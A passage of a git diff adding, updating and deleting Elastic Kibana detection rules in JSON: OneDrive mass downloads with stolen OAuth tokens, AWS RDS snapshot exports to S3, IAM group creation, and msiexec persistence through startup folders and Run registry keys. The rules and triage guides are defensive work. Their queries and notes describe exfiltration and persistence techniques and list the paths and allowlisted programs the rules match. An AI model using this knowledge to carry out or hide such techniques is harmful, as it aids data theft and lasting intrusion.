"https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 105 + }, + "id": "0d92d30a-5f3e-4b71-bc3d-4a0c4914b7e0_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_210.json b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_210.json index e44a220147a..1acfa15994a 100644 --- a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_210.json +++ b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_210.json @@ -23,7 +23,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_6.json b/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_6.json new file mode 100644 index 00000000000..49b37f32b89 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_6.json @@ -0,0 +1,144 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when an excessive number of files are downloaded from OneDrive using OAuth authentication. Adversaries may conduct phishing campaigns to steal OAuth tokens and impersonate users. These access tokens can then be used to download files from OneDrive.", + "false_positives": [ + "Legitimate users may download files from OneDrive using OAuth authentication. Ensure that the downloads are authorized and the user is known before taking action." + ], + "from": "now-9m", + "interval": "8m", + "language": "esql", + "license": "Elastic License v2", + "name": "M365 OneDrive Excessive File Downloads with OAuth Token", + "note": "## Triage and Analysis\n\n### Investigating M365 OneDrive Excessive File Downloads with OAuth Token\n\nThis rule detects an excessive number of files downloaded from OneDrive using OAuth authentication. Threat actors may use OAuth phishing attacks, such as **Device Code Authentication phishing**, to obtain valid access tokens and perform unauthorized data exfiltration. This method allows adversaries to bypass traditional authentication mechanisms, making it a stealthy and effective technique.\n\nThis rule leverages ESQL aggregations which limit the field values available in the alert document. To investigate further, it is recommended to identify the original documents ingested.\n\n#### Possible Investigation Steps\n\n- Review the `o365.audit.UserId` field to identify the user who performed the downloads. Check if this user typically downloads large amounts of data from OneDrive.\n- Correlate `o365.audit.UserId` with Entra Sign-In logs to verify the authentication method used and determine if it was expected for this user.\n- Review the authentication method used. If OAuth authentication was used, investigate whether it was expected for this user.\n- Identify the client application used for authentication. Determine if it is a legitimate enterprise-approved app or an unauthorized third-party application.\n- Check the number of unique files downloaded. If a user downloads a high volume of unique files in a short period, it may indicate data exfiltration.\n- Analyze the file types and directories accessed to determine if sensitive or confidential data was involved.\n- Investigate the source IP address and geolocation of the download activity. If it originates from an unusual or anonymized location, further scrutiny is needed.\n- Review other recent activities from the same user, such as file access, sharing, or permission changes, that may indicate further compromise.\n- Check for signs of session persistence using OAuth. If Azure sign-in logs are correlated where `authentication_protocol` or `originalTransferMethod` field shows `deviceCode`, the session was established through device code authentication.\n- Look for multiple authentication attempts from different devices or locations within a short timeframe, which could indicate unauthorized access.\n- Investigate if other OAuth-related anomalies exist, such as consent grants for unfamiliar applications or unexpected refresh token activity.\n- Review the `file.directory` value from the original documents to identify the specific folders or paths where the files were downloaded.\n\n### False Positive Analysis\n\n- Verify if the user regularly downloads large batches of files as part of their job function.\n- Determine if the downloads were triggered by an authorized automated process, such as a data backup or synchronization tool.\n- Confirm if the detected OAuth application is approved for enterprise use and aligns with expected usage patterns.\n\n### Response and Remediation\n\n- If unauthorized activity is confirmed, revoke the OAuth token used and terminate active OneDrive sessions.\n- Reset the affected user's password and require reauthentication to prevent continued unauthorized access.\n- Restrict OAuth app permissions and enforce conditional access policies to limit authentication to trusted devices and applications.\n- Monitor for additional signs of compromise, such as unusual email forwarding rules, external sharing of OneDrive files, or privilege escalation attempts.\n- Educate users on OAuth phishing risks and encourage the use of **Microsoft Defender for Office 365 Safe Links** to mitigate credential-based attacks.\n- Enable continuous monitoring for OAuth authentication anomalies using **Microsoft Entra ID sign-in logs** and security tools.\n", + "query": "from logs-o365.audit-*\n| where\n event.dataset == \"o365.audit\" and\n event.provider == \"OneDrive\" and\n event.action == \"FileDownloaded\" and\n o365.audit.AuthenticationType == \"OAuth\" and\n event.outcome == \"success\"\n and (user.id is not null and o365.audit.ApplicationId is not null)\n| eval session.id = coalesce(o365.audit.AppAccessContext.AADSessionId, session.id, null)\n| where session.id is not null\n| eval Esql.time_window_date_trunc = date_trunc(1 minutes, @timestamp)\n| stats\n Esql.file_directory_values = values(file.directory),\n Esql.file_extension_values = values(file.extension),\n Esql.application_name_values = values(application.name),\n Esql.file_name_count_distinct = count_distinct(file.name),\n Esql.o365_audit_Site_values = values(o365.audit.Site),\n Esql.o365_audit_SiteUrl_values = values(o365.audit.SiteUrl),\n Esql.user_domain_values = values(user.domain),\n Esql.token_id_values = values(token.id),\n Esql.event_count = count(*)\nby\n Esql.time_window_date_trunc,\n user.id,\n session.id,\n source.ip,\n o365.audit.ApplicationId\n| where Esql.file_name_count_distinct >= 25\n| keep\n Esql.*,\n user.id,\n source.ip,\n o365.audit.ApplicationId,\n session.id\n", + "references": [ + "https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.application_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.file_directory_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.file_extension_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.file_name_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.o365_audit_SiteUrl_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.o365_audit_Site_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.time_window_date_trunc", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.token_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.user_domain_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.ApplicationId", + "type": "keyword" + }, + { + "ecs": false, + "name": "session.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0e524fa6-eed3-11ef-82b4-f661ea17fbce", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: SharePoint", + "Data Source: OneDrive", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Exfiltration", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1530", + "name": "Data from Cloud Storage", + "reference": "https://attack.mitre.org/techniques/T1530/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 6 + }, + "id": "0e524fa6-eed3-11ef-82b4-f661ea17fbce_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_210.json b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_210.json new file mode 100644 index 00000000000..a221af23f4d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_210.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the export of a DB snapshot or DB cluster data to Amazon S3. Snapshot exports can be used for analytics or migration workflows, but adversaries may abuse them to exfiltrate sensitive data outside of RDS-managed storage. Exporting a snapshot creates a portable copy of the database contents, which, if performed without authorization, can indicate data theft, staging for exfiltration, or operator misconfiguration that exposes regulated information.", + "false_positives": [ + "Snapshot exports may be performed by administrators, automation pipelines, or data engineering workflows. Confirm whether the export was expected and initiated by an authorized user, role, or automation process. Snapshot exports by unfamiliar principals or from unexpected networks should be investigated. If known behavior causes false positives, it can be exempted from the rule." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS RDS Snapshot Export", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. \n> While every effort has been made to ensure its quality, validate and adapt it to suit your operational needs.\n\n### Investigating AWS RDS Snapshot Export\n\nExporting an RDS snapshot to Amazon S3 allows the full contents of a database to be written outside the managed\nRDS service boundary. While legitimate for analytics or migration, this action can also be a mechanism for data\nexfiltration. Because snapshot exports produce files that can be downloaded, shared, or accessed by other AWS principals,\nunauthorized exports may indicate staging for data theft or attempts to bypass database access controls.\n\nThis rule detects successful `StartExportTask` events. Activity of this type should be validated to ensure that only\nauthorized database, platform engineering, or analytics workflows initiated the export.\n\n#### Possible investigation steps\n\n- **Identify the actor and context**\n - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to determine which principal initiated the export.\n - Look at `source.ip`, `user.name`, and `user_agent.original` to understand where the export originated (console, CLI, SDK, automation).\n - Check whether the principal has historically performed snapshot exports.\n\n- **Determine what was exported**\n - Examine `aws.cloudtrail.request_parameters`:\n - Snapshot identifier being exported.\n - S3 bucket name and path.\n - KMS key used (or absence of encryption).\n - Map the snapshot and destination bucket to:\n - Application/owner team.\n - Environment (prod/staging/dev).\n - Data classification (PII, PHI, PCI, internal).\n\n- **Reconstruct timing and surrounding context**\n - Use `@timestamp` to correlate the export with:\n - Recent RDS modifications (`ModifyDBInstance`, `ModifyDBCluster`), snapshot deletions, or retention changes.\n - IAM role changes, access key issuance, or privilege escalation attempts.\n - Unusual authentication patterns (e.g., successful logins from new locations, failed console logins).\n - Check whether the export timing aligns with approved deployments or maintenance windows.\n\n- **Correlate with broader CloudTrail activity**\n - Pivot on the same user, role, or access key ID to look for:\n - Prior reconnaissance (e.g., `DescribeDBSnapshots`, `DescribeDBClusters`, `ListBuckets`).\n - Permission changes (`PutRolePolicy`, `AttachUserPolicy`).\n - Public exposure (e.g., S3 bucket ACL changes).\n - Determine whether multiple snapshots were exported around the same time.\n\n- **Validate intent with stakeholders**\n - Confirm with the database owner, analytics team, or platform engineering team whether:\n - The export was planned and authorized.\n - The target S3 bucket is approved for storing database contents.\n - Encryption and access controls meet organizational policy.\n\n### False positive analysis\n\n- **Authorized data analytics or ETL workflows**\n - Many organizations export snapshots for reporting, ML pipelines, or external data processing.\n - Validate that the export aligns with documented ETL or analytics processes.\n\n- **Automated snapshot export tools**\n - Backup pipelines, cost optimization, or data replication systems may export snapshots.\n - Tune the rule by excluding known IAM roles or automation user agents.\n\n- **CloudFormation or IaC triggers**\n - Infrastructure-as-code pipelines may trigger snapshot exports as part of stack updates.\n - Correlate with CloudFormation events to confirm legitimacy.\n\n### Response and remediation\n\n- **Contain potential exfiltration**\n - Review access to the destination S3 bucket and confirm that:\n - Bucket is encrypted with the expected KMS key.\n - Access is restricted to authorized principals.\n - No unusual downloads or cross-account accesses occurred.\n\n- **Investigate scope and impact**\n - Use CloudTrail to enumerate:\n - All export tasks started by the same actor.\n - Other snapshot or data-access API calls in the same time window.\n - Validate whether sensitive or regulated data may have been included.\n\n- **Credential and access remediation**\n - If activity appears unauthorized:\n - Revoke or rotate compromised IAM credentials.\n - Review STS session activity related to the actor.\n - Inspect IAM role policies for privilege escalation.\n\n- **Hardening and preventive controls**\n - Restrict the ability to call `StartExportTask` using:\n - IAM least-privilege policies.\n - Service Control Policies (SCPs) in production accounts.\n - Conditional IAM (e.g., requiring MFA, restricting by VPC endpoint or IP range).\n - Enable guardrails:\n - AWS Config/Security Hub controls for monitoring snapshot policy changes.\n - Alerts for exports to buckets outside approved accounts.\n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)** \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/).\n\n", + "query": "event.dataset: aws.cloudtrail \n and event.provider: rds.amazonaws.com \n and event.action: StartExportTask \n and event.outcome: success\n", + "references": [ + "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_StartExportTask.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "119c8877-8613-416d-a98a-96b6664ee73a", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Use Case: Asset Visibility", + "Tactic: Collection", + "Tactic: Exfiltration", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1213", + "name": "Data from Information Repositories", + "reference": "https://attack.mitre.org/techniques/T1213/", + "subtechnique": [ + { + "id": "T1213.006", + "name": "Databases", + "reference": "https://attack.mitre.org/techniques/T1213/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 210 + }, + "id": "119c8877-8613-416d-a98a-96b6664ee73a_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_207.json b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_207.json deleted file mode 100644 index 078e9d671cf..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_207.json +++ /dev/null @@ -1,97 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the creation of a group in AWS Identity and Access Management (IAM). Groups specify permissions for multiple users. Any user in a group automatically has the permissions that are assigned to the group.", - "false_positives": [ - "A group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Group creations by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS IAM Group Creation", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS IAM Group Creation\n\nAWS IAM allows organizations to manage user access and permissions securely. Groups in IAM simplify permission management by allowing multiple users to inherit the same permissions. However, adversaries may exploit this by creating unauthorized groups to gain persistent access. The detection rule monitors successful group creation events, flagging potential misuse by correlating specific AWS CloudTrail logs, thus aiding in identifying unauthorized access attempts.\n\n### Possible investigation steps\n\n- Review the AWS CloudTrail logs for the specific event.provider: iam.amazonaws.com and event.action: CreateGroup to identify the user or service that initiated the group creation.\n- Check the event.dataset: aws.cloudtrail logs for any associated event.outcome: success entries to confirm the successful creation of the group.\n- Investigate the permissions assigned to the newly created group to assess if they include any sensitive or high-privilege permissions that could pose a security risk.\n- Identify and review the IAM user or role that created the group to determine if they have a legitimate reason for this action and if their activity aligns with their typical behavior.\n- Cross-reference the group creation event with other recent IAM activities, such as user additions to the group or changes to group policies, to detect any suspicious patterns or anomalies.\n- Consult with relevant stakeholders or the user responsible for the group creation to verify the legitimacy of the action and gather additional context if necessary.\n\n### False positive analysis\n\n- Routine administrative actions by authorized personnel can trigger alerts. Regularly review and document legitimate group creation activities to differentiate them from unauthorized actions.\n- Automated scripts or tools used for infrastructure management may create groups as part of their normal operation. Identify and whitelist these scripts to prevent unnecessary alerts.\n- Temporary groups created for short-term projects or testing purposes might be flagged. Implement a naming convention for such groups and exclude them from alerts based on this pattern.\n- Scheduled tasks or maintenance activities that involve group creation should be logged and approved in advance. Use these logs to create exceptions in the detection rule.\n- Third-party integrations or services that require group creation for functionality can cause false positives. Verify these integrations and adjust the rule to exclude their known actions.\n\n### Response and remediation\n\n- Immediately review the AWS CloudTrail logs to confirm the unauthorized creation of the IAM group and identify the user or service responsible for the action.\n- Revoke any permissions associated with the newly created IAM group to prevent further unauthorized access or actions.\n- Temporarily disable or delete the unauthorized IAM group to contain the threat and prevent any potential misuse.\n- Conduct a thorough audit of recent IAM changes to identify any other unauthorized activities or anomalies that may indicate further compromise.\n- Escalate the incident to the security operations team for a detailed investigation and to assess the potential impact on the organization's security posture.\n- Implement additional monitoring and alerting for IAM group creation events to enhance detection capabilities and prevent similar incidents in the future.\n- Review and update IAM policies and permissions to ensure they follow the principle of least privilege, reducing the risk of unauthorized access.", - "query": "event.dataset:aws.cloudtrail and event.provider:iam.amazonaws.com and event.action:CreateGroup and event.outcome:success\n", - "references": [ - "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/create-group.html", - "https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateGroup.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "169f3a93-efc7-4df2-94d6-0d9438c310d1", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1136", - "name": "Create Account", - "reference": "https://attack.mitre.org/techniques/T1136/", - "subtechnique": [ - { - "id": "T1136.003", - "name": "Cloud Account", - "reference": "https://attack.mitre.org/techniques/T1136/003/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "169f3a93-efc7-4df2-94d6-0d9438c310d1_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1719ee47-89b8-4407-9d55-6dff2629dd4c_5.json b/packages/security_detection_engine/kibana/security_rule/1719ee47-89b8-4407-9d55-6dff2629dd4c_5.json new file mode 100644 index 00000000000..4e393a1e9f4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1719ee47-89b8-4407-9d55-6dff2629dd4c_5.json @@ -0,0 +1,132 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when the Windows installer process msiexec.exe creates a new persistence entry via scheduled tasks or startup.", + "false_positives": [ + "Legitimate scheduled tasks may be created during installation of new software." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "logs-endpoint.events.file-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via a Windows Installer", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Persistence via a Windows Installer\n\nWindows Installer, through msiexec.exe, facilitates software installation and configuration. Adversaries exploit this by creating persistence mechanisms, such as scheduled tasks or startup entries, to maintain access. The detection rule identifies suspicious activity by monitoring msiexec.exe for file creation in startup directories or registry modifications linked to auto-run keys, signaling potential persistence tactics.\n\n### Possible investigation steps\n\n- Review the alert details to identify the specific file path or registry path involved in the suspicious activity, focusing on the paths specified in the query such as \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*\" or \"H*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\".\n- Check the creation or modification timestamps of the files or registry entries to determine when the suspicious activity occurred and correlate it with other events or logs around the same time.\n- Investigate the parent process of msiexec.exe to understand how it was executed and whether it was initiated by a legitimate user action or another suspicious process.\n- Examine the contents of the created or modified files or registry entries to identify any scripts, executables, or commands that may indicate malicious intent.\n- Look for any associated network activity or connections initiated by msiexec.exe or related processes to identify potential command and control communication.\n- Cross-reference the involved file or registry paths with known indicators of compromise or threat intelligence sources to assess the risk level and potential threat actor involvement.\n- If applicable, isolate the affected system and perform a deeper forensic analysis to uncover any additional persistence mechanisms or lateral movement within the network.\n\n### False positive analysis\n\n- Legitimate software installations or updates may trigger the rule when msiexec.exe creates scheduled tasks or startup entries. Users can create exceptions for known software vendors or specific installation paths to reduce noise.\n- System administrators might use msiexec.exe for deploying software across the network, which can appear as suspicious activity. To handle this, exclude specific administrative accounts or IP ranges from the rule.\n- Some enterprise management tools may utilize msiexec.exe for legitimate configuration changes, including registry modifications. Identify and exclude these tools by their process names or associated registry paths.\n- Automated scripts or deployment tools that rely on msiexec.exe for software management can generate false positives. Consider excluding these scripts or tools by their execution context or associated file paths.\n- Regularly review and update the exclusion list to ensure it aligns with the current software deployment and management practices within the organization.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary.\n- Terminate the msiexec.exe process if it is confirmed to be involved in creating unauthorized persistence mechanisms.\n- Remove any scheduled tasks or startup entries created by msiexec.exe that are identified as malicious or unauthorized.\n- Restore any modified registry keys to their original state if they were altered to establish persistence.\n- Conduct a thorough scan of the system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any additional malicious files or processes.\n- Review and update security policies to restrict the use of msiexec.exe for non-administrative users, reducing the risk of exploitation.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.", + "query": "any where host.os.type == \"windows\" and\n (process.name : \"msiexec.exe\" or Effective_process.name : \"msiexec.exe\") and\n (\n (\n event.category == \"file\" and event.action == \"creation\" and\n file.path : (\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*\",\n \"?:\\\\programdata\\\\microsoft\\\\windows\\\\start menu\\\\programs\\\\startup\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\"\n ) and\n not file.path : (\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\Adobe Acrobat Update Task\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\HP\\\\Sure Click\\\\Sure Click ?.?.??.????\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\HP\\\\Sure Click\\\\Sure Click UI ?.?.??.????\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\HP\\\\Sure Click\\\\Upgrade Repair ?.?.??.????\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132-Logon\"\n )\n ) or\n (\n event.category == \"registry\" and event.action == \"modification\" and registry.data.strings != null and\n registry.path : (\n \"H*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"H*\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"H*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"H*\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\"\n ) and\n not registry.data.strings : (\n \"C:\\\\Program Files (x86)\\\\Common Files\\\\Acronis\\\\TibMounter\\\\tib_mounter_monitor.exe\",\n \"C:\\\\Program Files (x86)\\\\Common Files\\\\Java\\\\Java Update\\\\jusched.exe\",\n \"C:\\\\Program Files\\\\Citrix\\\\Secure Access Client\\\\CtxsDPS.exe --clean-user-installs\",\n \"C:\\\\Program Files\\\\OpenVPN\\\\bin\\\\openvpn-gui.exe\",\n \"C:\\\\Program Files\\\\Veeam\\\\Endpoint Backup\\\\Veeam.EndPoint.Tray.exe -NoControlPanel -CheckNumberOfRunningAgents\",\n \"\\\"C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco Secure Client\\\\UI\\\\csc_ui.exe\\\" -minimized\",\n \"\\\"C:\\\\Program Files (x86)\\\\Citrix\\\\ICA Client\\\\concentr.exe\\\" /startup\",\n \"\\\"C:\\\\Program Files (x86)\\\\Citrix\\\\ICA Client\\\\Receiver\\\\AnalyticsSrv.exe\\\" /Startup\",\n \"\\\"C:\\\\Program Files (x86)\\\\Citrix\\\\ICA Client\\\\redirector.exe\\\" /startup\",\n \"\\\"C:\\\\Program Files (x86)\\\\EPSON Software\\\\Download Navigator\\\\EPSDNMON.EXE\\\"\",\n \"\\\"C:\\\\Program Files (x86)\\\\Jabra\\\\Direct6\\\\jabra-direct.exe\\\" /minimized\",\n \"\\\"C:\\\\Program Files (x86)\\\\VMware\\\\VMware Workstation\\\\vmware-tray.exe\\\"\",\n \"\\\"C:\\\\Program Files\\\\ESET\\\\ESET Security\\\\ecmds.exe\\\" /run /hide /proxy\",\n \"\\\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\\\"\",\n \"\\\"C:\\\\Program Files\\\\KeePassXC\\\\KeePassXC.exe\\\"\",\n \"\\\"C:\\\\Program Files\\\\Palo Alto Networks\\\\GlobalProtect\\\\PanGPA.exe\\\"\",\n \"\\\"C:\\\\Program Files\\\\PDF24\\\\pdf24.exe\\\"\",\n \"\\\"C:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmtoolsd.exe\\\" -n vmusr\",\n \"\\\"C:\\\\PROGRA~2\\\\Citrix\\\\DEVICE~1\\\\Bin64\\\\DTCLIE~1.EXE\\\"\",\n \"\\\"%ProgramFiles%\\\\Teams Installer\\\\Teams.exe\\\" --checkInstall --source=default\"\n )\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Effective_process.name", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1719ee47-89b8-4407-9d55-6dff2629dd4c", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.007", + "name": "Msiexec", + "reference": "https://attack.mitre.org/techniques/T1218/007/" + } + ] + } + ] + } + ], + 